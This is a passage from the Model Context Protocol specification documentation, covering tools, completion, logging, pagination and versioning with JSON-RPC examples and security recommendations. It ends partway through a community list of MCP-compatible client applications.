"mimeType": "text/markdown",
"annotations": {
"audience": ["user"],
"priority": 0.8,
"lastModified": "2025-01-12T15:00:58Z"
}
}
```
Clients can use these annotations to:
* Filter resources based on their intended audience
* Prioritize which resources to include in context
* Display modification times or sort by recency
## Common URI Schemes
The protocol defines several standard URI schemes. This list is not
exhaustive—implementations are always free to use additional, custom URI schemes.
### https\://
Used to represent a resource available on the web.
Servers **SHOULD** use this scheme only when the client is able to fetch and load the
resource directly from the web on its own—that is, it doesn’t need to read the resource
via the MCP server.
For other use cases, servers **SHOULD** prefer to use another URI scheme, or define a
custom one, even if the server will itself be downloading resource contents over the
internet.
### file://
Used to identify resources that behave like a filesystem. However, the resources do not
need to map to an actual physical filesystem.
MCP servers **MAY** identify file:// resources with an
[XDG MIME type](https://specifications.freedesktop.org/shared-mime-info-spec/0.14/ar01s02.html#id-1.3.14),
like `inode/directory`, to represent non-regular files (such as directories) that don’t
otherwise have a standard MIME type.
### git://
Git version control integration.
### Custom URI Schemes
Custom URI schemes **MUST** be in accordance with [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986),
taking the above guidance into account.
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Resource not found: `-32002`
* Internal errors: `-32603`
Example error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"error": {
"code": -32002,
"message": "Resource not found",
"data": {
"uri": "file:///nonexistent.txt"
}
}
}
```
## Security Considerations
1. Servers **MUST** validate all resource URIs
2. Access controls **SHOULD** be implemented for sensitive resources
3. Binary data **MUST** be properly encoded
4. Resource permissions **SHOULD** be checked before operations
# Tools
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/tools
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) allows servers to expose tools that can be invoked by
language models. Tools enable models to interact with external systems, such as querying
databases, calling APIs, or performing computations. Each tool is uniquely identified by
a name and includes metadata describing its schema.
## User Interaction Model
Tools in MCP are designed to be **model-controlled**, meaning that the language model can
discover and invoke tools automatically based on its contextual understanding and the
user's prompts.
However, implementations are free to expose tools through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
For trust & safety and security, there **SHOULD** always
be a human in the loop with the ability to deny tool invocations.
Applications **SHOULD**:
* Provide UI that makes clear which tools are being exposed to the AI model
* Insert clear visual indicators when tools are invoked
* Present confirmation prompts to the user for operations, to ensure a human is in the
loop
## Capabilities
Servers that support tools **MUST** declare the `tools` capability:
```json theme={null}
{
"capabilities": {
"tools": {
"listChanged": true
}
}
}
```
`listChanged` indicates whether the server will emit notifications when the list of
available tools changes.
## Protocol Messages
### Listing Tools
To discover available tools, clients send a `tools/list` request. This operation supports
[pagination](/specification/2025-11-25/server/utilities/pagination).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "tools/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"tools": [
{
"name": "get_weather",
"title": "Weather Information Provider",
"description": "Get current weather information for a location",
"inputSchema": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "City name or zip code"
}
},
"required": ["location"]
},
"icons": [
{
"src": "https://example.com/weather-icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
]
}
],
"nextCursor": "next-page-cursor"
}
}
```
### Calling Tools
To invoke a tool, clients send a `tools/call` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "get_weather",
"arguments": {
"location": "New York"
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"content": [
{
"type": "text",
"text": "Current weather in New York:\nTemperature: 72°F\nConditions: Partly cloudy"
}
],
"isError": false
}
}
```
### List Changed Notification
When the list of available tools changes, servers that declared the `listChanged`
capability **SHOULD** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tools/list_changed"
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant LLM
participant Client
participant Server
Note over Client,Server: Discovery
Client->>Server: tools/list
Server-->>Client: List of tools
Note over Client,LLM: Tool Selection
LLM->>Client: Select tool to use
Note over Client,Server: Invocation
Client->>Server: tools/call
Server-->>Client: Tool result
Client->>LLM: Process result
Note over Client,Server: Updates
Server--)Client: tools/list_changed
Client->>Server: tools/list
Server-->>Client: Updated tools
```
## Data Types
### Tool
A tool definition includes:
* `name`: Unique identifier for the tool
* `title`: Optional human-readable name of the tool for display purposes.
* `description`: Human-readable description of functionality
* `icons`: Optional array of icons for display in user interfaces
* `inputSchema`: JSON Schema defining expected parameters
* Follows the [JSON Schema usage guidelines](/specification/2025-11-25/basic#json-schema-usage)
* Defaults to 2020-12 if no `$schema` field is present
* **MUST** be a valid JSON Schema object (not `null`)
* For tools with no parameters, use one of these valid approaches:
* `{ "type": "object", "additionalProperties": false }` - **Recommended**: explicitly accepts only empty objects
* `{ "type": "object" }` - accepts any object (including with properties)
* `outputSchema`: Optional JSON Schema defining expected output structure
* Follows the [JSON Schema usage guidelines](/specification/2025-11-25/basic#json-schema-usage)
* Defaults to 2020-12 if no `$schema` field is present
* `annotations`: Optional properties describing tool behavior
For trust & safety and security, clients **MUST** consider tool annotations to
be untrusted unless they come from trusted servers.
#### Tool Names
* Tool names **SHOULD** be between 1 and 128 characters in length (inclusive).
* Tool names **SHOULD** be considered case-sensitive.
* The following **SHOULD** be the only allowed characters: uppercase and lowercase ASCII letters (A-Z, a-z), digits
(0-9), underscore (_), hyphen (-), and dot (.)
* Tool names **SHOULD NOT** contain spaces, commas, or other special characters.
* Tool names **SHOULD** be unique within a server.
* Example valid tool names:
* getUser
* DATA_EXPORT_v2
* admin.tools.list
### Tool Result
Tool results may contain [**structured**](#structured-content) or **unstructured** content.
**Unstructured** content is returned in the `content` field of a result, and can contain multiple content items of different types:
All content types (text, image, audio, resource links, and embedded resources)
support optional
[annotations](/specification/2025-11-25/server/resources#annotations) that
provide metadata about audience, priority, and modification times. This is the
same annotation format used by resources and prompts.
#### Text Content
```json theme={null}
{
"type": "text",
"text": "Tool result text"
}
```
#### Image Content
```json theme={null}
{
"type": "image",
"data": "base64-encoded-data",
"mimeType": "image/png",
"annotations": {
"audience": ["user"],
"priority": 0.9
}
}
```
#### Audio Content
```json theme={null}
{
"type": "audio",
"data": "base64-encoded-audio-data",
"mimeType": "audio/wav"
}
```
#### Resource Links
A tool **MAY** return links to [Resources](/specification/2025-11-25/server/resources), to provide additional context
or data. In this case, the tool will return a URI that can be subscribed to or fetched by the client:
```json theme={null}
{
"type": "resource_link",
"uri": "file:///project/src/main.rs",
"name": "main.rs",
"description": "Primary application entry point",
"mimeType": "text/x-rust"
}
```
Resource links support the same [Resource annotations](/specification/2025-11-25/server/resources#annotations) as regular resources to help clients understand how to use them.
Resource links returned by tools are not guaranteed to appear in the results
of a `resources/list` request.
#### Embedded Resources
[Resources](/specification/2025-11-25/server/resources) **MAY** be embedded to provide additional context
or data using a suitable [URI scheme](./resources#common-uri-schemes). Servers that use embedded resources **SHOULD** implement the `resources` capability:
```json theme={null}
{
"type": "resource",
"resource": {
"uri": "file:///project/src/main.rs",
"mimeType": "text/x-rust",
"text": "fn main() {\n println!(\"Hello world!\");\n}",
"annotations": {
"audience": ["user", "assistant"],
"priority": 0.7,
"lastModified": "2025-05-03T14:30:00Z"
}
}
}
```
Embedded resources support the same [Resource annotations](/specification/2025-11-25/server/resources#annotations) as regular resources to help clients understand how to use them.
#### Structured Content
**Structured** content is returned as a JSON object in the `structuredContent` field of a result.
For backwards compatibility, a tool that returns structured content **SHOULD** also return the serialized JSON in a TextContent block.
#### Output Schema
Tools may also provide an output schema for validation of structured results.
If an output schema is provided:
* Servers **MUST** provide structured results that conform to this schema.
* Clients **SHOULD** validate structured results against this schema.
Example tool with output schema:
```json theme={null}
{
"name": "get_weather_data",
"title": "Weather Data Retriever",
"description": "Get current weather data for a location",
"inputSchema": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "City name or zip code"
}
},
"required": ["location"]
},
"outputSchema": {
"type": "object",
"properties": {
"temperature": {
"type": "number",
"description": "Temperature in celsius"
},
"conditions": {
"type": "string",
"description": "Weather conditions description"
},
"humidity": {
"type": "number",
"description": "Humidity percentage"
}
},
"required": ["temperature", "conditions", "humidity"]
}
}
```
Example valid response for this tool:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"result": {
"content": [
{
"type": "text",
"text": "{\"temperature\": 22.5, \"conditions\": \"Partly cloudy\", \"humidity\": 65}"
}
],
"structuredContent": {
"temperature": 22.5,
"conditions": "Partly cloudy",
"humidity": 65
}
}
}
```
Providing an output schema helps clients and LLMs understand and properly handle structured tool outputs by:
* Enabling strict schema validation of responses
* Providing type information for better integration with programming languages
* Guiding clients and LLMs to properly parse and utilize the returned data
* Supporting better documentation and developer experience
### Schema Examples
#### Tool with default 2020-12 schema:
```json theme={null}
{
"name": "calculate_sum",
"description": "Add two numbers",
"inputSchema": {
"type": "object",
"properties": {
"a": { "type": "number" },
"b": { "type": "number" }
},
"required": ["a", "b"]
}
}
```
#### Tool with explicit draft-07 schema:
```json theme={null}
{
"name": "calculate_sum",
"description": "Add two numbers",
"inputSchema": {
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
"properties": {
"a": { "type": "number" },
"b": { "type": "number" }
},
"required": ["a", "b"]
}
}
```
#### Tool with no parameters:
```json theme={null}
{
"name": "get_current_time",
"description": "Returns the current server time",
"inputSchema": {
"type": "object",
"additionalProperties": false
}
}
```
## Error Handling
Tools use two error reporting mechanisms:
1. **Protocol Errors**: Standard JSON-RPC errors for issues like:
* Unknown tools
* Malformed requests (requests that fail to satisfy [CallToolRequest schema](/specification/2025-11-25/schema#calltoolrequest))
* Server errors
2. **Tool Execution Errors**: Reported in tool results with `isError: true`:
* API failures
* Input validation errors (e.g., date in wrong format, value out of range)
* Business logic errors
**Tool Execution Errors** contain actionable feedback that language models can use to self-correct and retry with adjusted parameters.
**Protocol Errors** indicate issues with the request structure itself that models are less likely to be able to fix.
Clients **SHOULD** provide tool execution errors to language models to enable self-correction.
Clients **MAY** provide protocol errors to language models, though these are less likely to result in successful recovery.
Example protocol error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"error": {
"code": -32602,
"message": "Unknown tool: invalid_tool_name"
}
}
```
Example tool execution error (input validation):
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"content": [
{
"type": "text",
"text": "Invalid departure date: must be in the future. Current date is 08/08/2025."
}
],
"isError": true
}
}
```
## Security Considerations
1. Servers **MUST**:
* Validate all tool inputs
* Implement proper access controls
* Rate limit tool invocations
* Sanitize tool outputs
2. Clients **SHOULD**:
* Prompt for user confirmation on sensitive operations
* Show tool inputs to the user before calling the server, to avoid malicious or
accidental data exfiltration
* Validate tool results before passing to LLM
* Implement timeouts for tool calls
* Log tool usage for audit purposes
# Completion
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/utilities/completion
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to offer
autocompletion suggestions for the arguments of prompts and resource templates. When
users are filling in argument values for a specific prompt (identified by name) or
resource template (identified by URI), servers can provide contextual suggestions.
## User Interaction Model
Completion in MCP is designed to support interactive user experiences similar to IDE code
completion.
For example, applications may show completion suggestions in a dropdown or popup menu as
users type, with the ability to filter and select from available options.
However, implementations are free to expose completion through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
## Capabilities
Servers that support completions **MUST** declare the `completions` capability:
```json theme={null}
{
"capabilities": {
"completions": {}
}
}
```
## Protocol Messages
### Requesting Completions
To get completion suggestions, clients send a `completion/complete` request specifying
what is being completed through a reference type:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "completion/complete",
"params": {
"ref": {
"type": "ref/prompt",
"name": "code_review"
},
"argument": {
"name": "language",
"value": "py"
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"completion": {
"values": ["python", "pytorch", "pyside"],
"total": 10,
"hasMore": true
}
}
}
```
For prompts or URI templates with multiple arguments, clients should include previous completions in the `context.arguments` object to provide context for subsequent requests.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "completion/complete",
"params": {
"ref": {
"type": "ref/prompt",
"name": "code_review"
},
"argument": {
"name": "framework",
"value": "fla"
},
"context": {
"arguments": {
"language": "python"
}
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"completion": {
"values": ["flask"],
"total": 1,
"hasMore": false
}
}
}
```
### Reference Types
The protocol supports two types of completion references:
| Type | Description | Example |
| -------------- | --------------------------- | --------------------------------------------------- |
| `ref/prompt` | References a prompt by name | `{"type": "ref/prompt", "name": "code_review"}` |
| `ref/resource` | References a resource URI | `{"type": "ref/resource", "uri": "file:///{path}"}` |
### Completion Results
Servers return an array of completion values ranked by relevance, with:
* Maximum 100 items per response
* Optional total number of available matches
* Boolean indicating if additional results exist
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client: User types argument
Client->>Server: completion/complete
Server-->>Client: Completion suggestions
Note over Client: User continues typing
Client->>Server: completion/complete
Server-->>Client: Refined suggestions
```
## Data Types
### CompleteRequest
* `ref`: A `PromptReference` or `ResourceReference`
* `argument`: Object containing:
* `name`: Argument name
* `value`: Current value
* `context`: Object containing:
* `arguments`: A mapping of already-resolved argument names to their values.
### CompleteResult
* `completion`: Object containing:
* `values`: Array of suggestions (max 100)
* `total`: Optional total matches
* `hasMore`: Additional results flag
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Method not found: `-32601` (Capability not supported)
* Invalid prompt name: `-32602` (Invalid params)
* Missing required arguments: `-32602` (Invalid params)
* Internal errors: `-32603` (Internal error)
## Implementation Considerations
1. Servers **SHOULD**:
* Return suggestions sorted by relevance
* Implement fuzzy matching where appropriate
* Rate limit completion requests
* Validate all inputs
2. Clients **SHOULD**:
* Debounce rapid completion requests
* Cache completion results where appropriate
* Handle missing or partial results gracefully
## Security
Implementations **MUST**:
* Validate all completion inputs
* Implement appropriate rate limiting
* Control access to sensitive suggestions
* Prevent completion-based information disclosure
# Logging
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/utilities/logging
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to send
structured log messages to clients. Clients can control logging verbosity by setting
minimum log levels, with servers sending notifications containing severity levels,
optional logger names, and arbitrary JSON-serializable data.
## User Interaction Model
Implementations are free to expose logging through any interface pattern that suits their
needs—the protocol itself does not mandate any specific user interaction model.
## Capabilities
Servers that emit log message notifications **MUST** declare the `logging` capability:
```json theme={null}
{
"capabilities": {
"logging": {}
}
}
```
## Log Levels
The protocol follows the standard syslog severity levels specified in
[RFC 5424](https://datatracker.ietf.org/doc/html/rfc5424#section-6.2.1):
| Level | Description | Example Use Case |
| --------- | -------------------------------- | -------------------------- |
| debug | Detailed debugging information | Function entry/exit points |
| info | General informational messages | Operation progress updates |
| notice | Normal but significant events | Configuration changes |
| warning | Warning conditions | Deprecated feature usage |
| error | Error conditions | Operation failures |
| critical | Critical conditions | System component failures |
| alert | Action must be taken immediately | Data corruption detected |
| emergency | System is unusable | Complete system failure |
## Protocol Messages
### Setting Log Level
To configure the minimum log level, clients **MAY** send a `logging/setLevel` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "logging/setLevel",
"params": {
"level": "info"
}
}
```
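On success, the server acknowledges the level change with an empty result (a minimal sketch):

**Response:**

```json theme={null}
{
  "jsonrpc": "2.0",
  "id": 1,
  "result": {}
}
```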
### Log Message Notifications
Servers send log messages using `notifications/message` notifications:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/message",
"params": {
"level": "error",
"logger": "database",
"data": {
"error": "Connection failed",
"details": {
"host": "localhost",
"port": 5432
}
}
}
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Configure Logging
Client->>Server: logging/setLevel (info)
Server-->>Client: Empty Result
Note over Client,Server: Server Activity
Server--)Client: notifications/message (info)
Server--)Client: notifications/message (warning)
Server--)Client: notifications/message (error)
Note over Client,Server: Level Change
Client->>Server: logging/setLevel (error)
Server-->>Client: Empty Result
Note over Server: Only sends error level and above
```
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Invalid log level: `-32602` (Invalid params)
* Configuration errors: `-32603` (Internal error)
## Implementation Considerations
1. Servers **SHOULD**:
* Rate limit log messages
* Include relevant context in data field
* Use consistent logger names
* Remove sensitive information
2. Clients **MAY**:
* Present log messages in the UI
* Implement log filtering/search
* Display severity visually
* Persist log messages
## Security
1. Log messages **MUST NOT** contain:
* Credentials or secrets
* Personal identifying information
* Internal system details that could aid attacks
2. Implementations **SHOULD**:
* Rate limit messages
* Validate all data fields
* Control log access
* Monitor for sensitive content
# Pagination
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/utilities/pagination
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) supports paginating list operations that may return
large result sets. Pagination allows servers to yield results in smaller chunks rather
than all at once.
Pagination is especially important when connecting to external services over the
internet, but also useful for local integrations to avoid performance issues with large
data sets.
## Pagination Model
Pagination in MCP uses an opaque cursor-based approach, instead of numbered pages.
* The **cursor** is an opaque string token, representing a position in the result set
* **Page size** is determined by the server, and clients **MUST NOT** assume a fixed page
size
## Response Format
Pagination starts when the server sends a **response** that includes:
* The current page of results
* An optional `nextCursor` field if more results exist
```json theme={null}
{
"jsonrpc": "2.0",
"id": "123",
"result": {
"resources": [...],
"nextCursor": "eyJwYWdlIjogM30="
}
}
```
## Request Format
After receiving a cursor, the client can *continue* paginating by issuing a request
including that cursor:
```json theme={null}
{
"jsonrpc": "2.0",
"id": "124",
"method": "resources/list",
"params": {
"cursor": "eyJwYWdlIjogMn0="
}
}
```
## Pagination Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Client->>Server: List Request (no cursor)
loop Pagination Loop
Server-->>Client: Page of results + nextCursor
Client->>Server: List Request (with cursor)
end
```
## Operations Supporting Pagination
The following MCP operations support pagination:
* `resources/list` - List available resources
* `resources/templates/list` - List resource templates
* `prompts/list` - List available prompts
* `tools/list` - List available tools
## Implementation Guidelines
1. Servers **SHOULD**:
* Provide stable cursors
* Handle invalid cursors gracefully
2. Clients **SHOULD**:
* Treat a missing `nextCursor` as the end of results
* Support both paginated and non-paginated flows
3. Clients **MUST** treat cursors as opaque tokens:
* Don't make assumptions about cursor format
* Don't attempt to parse or modify cursors
* Don't persist cursors across sessions
## Error Handling
Invalid cursors **SHOULD** result in an error with code -32602 (Invalid params).
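For example, a list request carrying a stale or malformed cursor might produce a response like this (a sketch; the message wording is server-defined):

```json theme={null}
{
  "jsonrpc": "2.0",
  "id": "124",
  "error": {
    "code": -32602,
    "message": "Invalid params: unknown cursor"
  }
}
```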
# Versioning
Source: https://modelcontextprotocol.io/specification/versioning
The Model Context Protocol uses string-based version identifiers following the format
`YYYY-MM-DD`, to indicate the last date backwards incompatible changes were made.
The protocol version will *not* be incremented when the
protocol is updated, as long as the changes maintain backwards compatibility. This allows
for incremental improvements while preserving interoperability.
## Revisions
Revisions may be marked as:
* **Draft**: in-progress specifications, not yet ready for consumption.
* **Current**: the current protocol version, which is ready for use and may continue to
receive backwards compatible changes.
* **Final**: past, complete specifications that will not be changed.
The **current** protocol version is [**2025-11-25**](/specification/2025-11-25/).
## Negotiation
Version negotiation happens during
[initialization](/specification/latest/basic/lifecycle#initialization). Clients and
servers **MAY** support multiple protocol versions simultaneously, but they **MUST**
agree on a single version to use for the session.
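As a sketch (the client and server names are illustrative), the client states its preferred version in the `initialize` request, and the server answers with the version that will govern the session, which may differ if the server does not support the requested one:

```json theme={null}
{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "initialize",
  "params": {
    "protocolVersion": "2025-11-25",
    "capabilities": {},
    "clientInfo": { "name": "example-client", "version": "1.0.0" }
  }
}
```

```json theme={null}
{
  "jsonrpc": "2.0",
  "id": 1,
  "result": {
    "protocolVersion": "2025-11-25",
    "capabilities": {},
    "serverInfo": { "name": "example-server", "version": "1.0.0" }
  }
}
```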
The protocol provides appropriate error handling if version negotiation fails, allowing
clients to gracefully terminate connections when they cannot find a version compatible
with the server.
# Example Clients
Source: https://modelcontextprotocol.io/clients
A list of applications that support MCP integrations
This page showcases applications that support the Model Context Protocol (MCP). Each client may support different MCP features:
| Feature      | Description                                               |
| ------------ | --------------------------------------------------------- |
| Resources    | Server-exposed data and content                           |
| Prompts      | Pre-defined templates for LLM interactions                |
| Tools        | Executable functions that LLMs can invoke                 |
| Discovery    | Support for tools/prompts/resources changed notifications |
| Instructions | Server-provided guidance for LLMs                         |
| Sampling     | Server-initiated LLM completions                          |
| Roots        | Filesystem boundary definitions                           |
| Elicitation  | User information requests                                 |
| Tasks        | Long-running operation tracking                           |
| Apps         | Interactive HTML interfaces                               |
This list is maintained by the community. If you notice any inaccuracies or would like to add or update information about MCP support in your application, please [submit a pull request](https://github.com/modelcontextprotocol/modelcontextprotocol/pulls).
## Client details
5ire is an open source cross-platform desktop AI assistant that supports tools through MCP servers.
**Key features:**
* Built-in MCP servers can be quickly enabled and disabled.
* Users can add more servers by modifying the configuration file.
* It is open-source and user-friendly, suitable for beginners.
* MCP support will continue to improve.
AgentAI is a Rust library designed to simplify the creation of AI agents. The library includes seamless integration with MCP Servers.
**Key features:**
* Multi-LLM – supports most LLM APIs (OpenAI, Anthropic, Gemini, Ollama, and any OpenAI-API-compatible provider).
* Built-in support for MCP Servers.
* Create agentic flows in a type- and memory-safe language like Rust.
**Learn more:**
* [Example of MCP Server integration](https://github.com/AdamStrojek/rust-agentai/blob/master/examples/tools_mcp.rs)
AgenticFlow is a no-code AI platform that helps you build agents that handle sales, marketing, and creative tasks around the clock. Connect 2,500+ APIs and 10,000+ tools securely via MCP.
**Key features:**
* No-code AI agent creation and workflow building.
* Access a vast library of 10,000+ tools and 2,500+ APIs through MCP.
* Simple 3-step process to connect MCP servers.
* Securely manage connections and revoke access anytime.
**Learn more:**
* [AgenticFlow MCP Integration](https://agenticflow.ai/mcp)
AIQL TUUI is a native, cross-platform desktop AI chat application with MCP support. It supports multiple AI providers (e.g., Anthropic, Cloudflare, Deepseek, OpenAI, Qwen), local AI models (via vLLM, Ray, etc.), and aggregated API platforms (such as Deepinfra, Openrouter, and more).
**Key features:**
* **Dynamic LLM API & Agent Switching**: Seamlessly toggle between different LLM APIs and agents on the fly.
* **Comprehensive Capabilities Support**: Built-in support for tools, prompts, resources, and sampling methods.
* **Configurable Agents**: Enhanced flexibility with selectable and customizable tools via agent settings.
* **Advanced Sampling Control**: Modify sampling parameters and leverage multi-round sampling for optimal results.
* **Cross-Platform Compatibility**: Fully compatible with macOS, Windows, and Linux.
* **Free & Open-Source (FOSS)**: Permissive licensing allows modifications and custom app bundling.
**Learn more:**
* [TUUI document](https://www.tuui.com/)
* [AIQL GitHub repository](https://github.com/AI-QL)
Amazon Q CLI is an open-source, agentic coding assistant for terminals.
**Key features:**
* Full support for MCP servers.
* Edit prompts using your preferred text editor.
* Access saved prompts instantly with `@`.
* Control and organize AWS resources directly from your terminal.
* Tools, profiles, context management, auto-compact, and so much more!
**Get Started**
```bash theme={null}
brew install amazon-q
```
Amazon Q IDE is an open-source, agentic coding assistant for IDEs.
**Key features:**
* Support for the VSCode, JetBrains, Visual Studio, and Eclipse IDEs.
* Control and organize AWS resources directly from your IDE.
* Manage permissions for each MCP tool via the IDE user interface.
Amp is an agentic coding tool built by Sourcegraph. It runs in VS Code (and compatible forks like Cursor, Windsurf, and VSCodium), JetBrains IDEs, Neovim, and as a command-line tool. It's also multiplayer — you can share threads and collaborate with your team.
**Key features:**
* Granular control over enabled tools and permissions
* Support for MCP servers defined in VS Code `mcp.json`
Apify MCP Tester is an open-source client that connects to any MCP server using Server-Sent Events (SSE).
It is a standalone Apify Actor designed for testing MCP servers over SSE, with support for Authorization headers.
It uses plain JavaScript (old-school style) and is hosted on Apify, allowing you to run it without any setup.
**Key features:**
* Connects to any MCP server via SSE.
* Works with the [Apify MCP Server](https://mcp.apify.com) to interact with one or more Apify [Actors](https://apify.com/store).
* Dynamically utilizes tools based on context and user queries (if supported by the server).
Apigene MCP Client is an AI-powered conversational interface that enables seamless interaction with multiple applications, APIs, and MCP servers through natural language. It provides a unified interface for deploying agents across different AI platforms with optimized performance and governance.
**Key features:**
* **Multi-LLM Compatibility**: Works seamlessly with all leading AI platforms including Claude, OpenAI (ChatGPT), Gemini, xAI, and OpenRouter. Deploy the same agent across different platforms without modification.
* **Optimized for Cost & Performance**: Dynamic tool loading loads tools only when needed, enabling thousands of tools without context bloat. Tool output optimization provides up to 99% payload reduction via compact JSON representation. Parallel execution runs multiple tool calls simultaneously for 10x faster responses.
* **Unified Multi-Tool Interface**: Mesh multiple APIs and MCP servers into a single agent. Interact with all tools seamlessly from one Copilot interface without glue code or framework-specific logic.
* **Governed Access & Audit**: Fine-grained access control defines exactly which operations each user or agent can perform. Complete audit trail tracks every tool call with timestamps, inputs, and outputs for compliance.
**Learn more:**
* [Apigene Copilot Documentation](https://docs.apigene.ai/user-guide/copilot)
Augment Code is an AI-powered coding platform for VS Code and JetBrains with autonomous agents, chat, and completions. Both local and remote agents are backed by full codebase awareness and native support for MCP, enabling enhanced context through external sources and tools.
**Key features:**
* Full MCP support in local and remote agents.
* Add additional context through MCP servers.
* Automate your development workflows with MCP tools.
* Works in VS Code and JetBrains IDEs.
Avatar-Shell is an electron-based MCP client application that prioritizes avatar conversations and media output such as images.
**Key features:**
* MCP tools and resources can be used
* Supports avatar-to-avatar communication via socket.io.
* Supports the mixed use of multiple LLM APIs.
* The daemon mechanism allows for flexible scheduling.
BeeAI Framework is an open-source framework for building, deploying, and serving powerful agentic workflows at scale. The framework includes the **MCP Tool**, a native feature that simplifies the integration of MCP servers into agentic workflows.
**Key features:**
* Seamlessly incorporate MCP tools into agentic workflows.
* Quickly instantiate framework-native tools from connected MCP client(s).
* Planned future support for agentic MCP capabilities.
**Learn more:**
* [Example of using MCP tools in agentic workflow](https://i-am-bee.github.io/beeai-framework/#/typescript/tools?id=using-the-mcptool-class)
BoltAI is a native, all-in-one AI chat client with MCP support. BoltAI supports multiple AI providers (OpenAI, Anthropic, Google AI...), including local AI models (via Ollama, LM Studio, or LMX).
**Key features:**
* MCP Tool integrations: once configured, users can enable individual MCP servers in each chat
* MCP quick setup: import configuration from Claude Desktop app or Cursor editor
* Invoke MCP tools inside any app with AI Command feature
* Integrate with remote MCP servers in the mobile app
**Learn more:**
* [BoltAI docs](https://boltai.com/docs/plugins/mcp-servers)
* [BoltAI website](https://boltai.com)
Call Chirp uses AI to capture every critical detail from your business conversations, automatically syncing insights to your CRM and project tools so you never miss another deal-closing moment.
**Key features:**
* Save transcriptions from Zoom, Google Meet, and more
* MCP Tools for voice AI agents
* Remote MCP server support
Chatbox is a better UI and desktop app for ChatGPT, Claude, and other LLMs, available on Windows, Mac, Linux, and the web. It's open-source and has garnered 37K stars on GitHub.
**Key features:**
* Tools support for MCP servers
* Support both local and remote MCP servers
* Built-in MCP servers marketplace
ChatFrame is a cross-platform desktop chatbot that unifies access to multiple AI language models, supports custom tool integration via MCP servers, and enables RAG conversations with your local files—all in a single, polished app for macOS and Windows.
**Key features:**
* Unified access to top LLM providers (OpenAI, Anthropic, DeepSeek, xAI, and more) in one interface
* Built-in retrieval-augmented generation (RAG) for instant, private search across your PDFs, text, and code files
* Plug-in system for custom tools via Model Context Protocol (MCP) servers
* Multimodal chat: supports images, text, and live interactive artifacts
ChatGPT is OpenAI's AI assistant that provides MCP support for remote servers to conduct deep research.
**Key features:**
* Support for MCP via connections UI in settings
* Access to search tools from configured MCP servers for deep research
* Enterprise-grade security and compliance features
ChatWise is a desktop-optimized, high-performance chat application that lets you bring your own API keys. It supports a wide range of LLMs and integrates with MCP to enable tool workflows.
**Key features:**
* Tools support for MCP servers
* Offers built-in tools like web search, artifacts, and image generation.
Chorus is a native Mac app for chatting with AIs. Chat with multiple models at once, run tools and MCPs, create projects, quick chat, bring your own key, all in a blazing fast, keyboard shortcut friendly app.
**Key features:**
* MCP support with one-click install
* Built-in tools, like web search, terminal, and image generation
* Chat with multiple models at once (cloud or local)
* Create projects with scoped memory
* Quick chat with an AI that can see your screen
Claude Code is an interactive agentic coding tool from Anthropic that helps you code faster through natural language commands. It supports MCP integration for resources, prompts, tools, and roots, and also functions as an MCP server to integrate with other clients.
**Key features:**
* Full support for resources, prompts, tools, and roots from MCP servers
* Offers its own tools through an MCP server for integrating with other MCP clients
Claude Desktop provides comprehensive support for MCP, enabling deep integration with local tools and data sources.
**Key features:**
* Full support for resources, allowing attachment of local files and data
* Support for prompt templates
* Tool integration for executing commands and scripts
* Local server connections for enhanced privacy and security
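As a point of reference, Claude Desktop reads local server definitions from its `claude_desktop_config.json` file using the common `mcpServers` layout. A minimal sketch follows; the `weather` server name and script path are placeholders, not a prescribed setup:

```json theme={null}
{
  "mcpServers": {
    "weather": {
      "command": "python",
      "args": ["/absolute/path/to/weather.py"]
    }
  }
}
```

After editing the file, restart Claude Desktop so the new server is picked up.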
Claude.ai is Anthropic's web-based AI assistant that provides MCP support for remote servers.
**Key features:**
* Support for remote MCP servers via integrations UI in settings
* Access to tools, prompts, and resources from configured MCP servers
* Seamless integration with Claude's conversational interface
* Enterprise-grade security and compliance features
Cline is an autonomous coding agent in VS Code that edits files, runs commands, uses a browser, and more–with your permission at each step.
**Key features:**
